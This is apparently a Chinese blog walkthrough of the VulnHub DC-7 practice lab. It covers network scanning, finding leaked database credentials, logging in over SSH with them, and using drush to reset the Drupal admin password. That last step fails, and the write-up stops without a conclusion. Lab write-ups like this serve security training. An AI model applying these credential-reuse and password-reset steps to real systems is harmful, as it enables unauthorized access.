漏洞复现 -- DC-7

靶场地址

https://download.vulnhub.com/dc/DC-7.zip

目标

获取所有的flag

漏洞复现

sudo arp-scan -l
# 探测主机存活

nmap -p- 192.168.5.131 --min-rate=5000

http://192.168.5.131:80
# 访问80页面,寻找有用信息。根据提示不要暴力破解,寻找框以外的内容“@DC7USER”

<?php
	$servername = "localhost";
	$username = "dc7user";
	$password = "MdR3xOgB7#dW";
	$dbname = "Staff";
	$conn = mysqli_connect($servername, $username, $password, $dbname);
?>

尝试登陆网页失败

靶场开放了22端口,尝试SSH连接
ssh dc7user@192.168.5.131
MdR3xOgB7#dW

ls
# 提示有一封新的邮件

cd /var/mail
cat dc7user
# 在一封邮件里面,发现了一条计划任务

cd /opt/scripts
cat backups.sh
# 查看backups.sh文件,发现能运行drush命令,drush命令可以更改密码,在/var/www/html目录下运行drush命令,更改admin的密码。

cd /var/www/html
drush user-password admin --password "123456"

使用 admin / 123456 登录一直不成功

总结

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值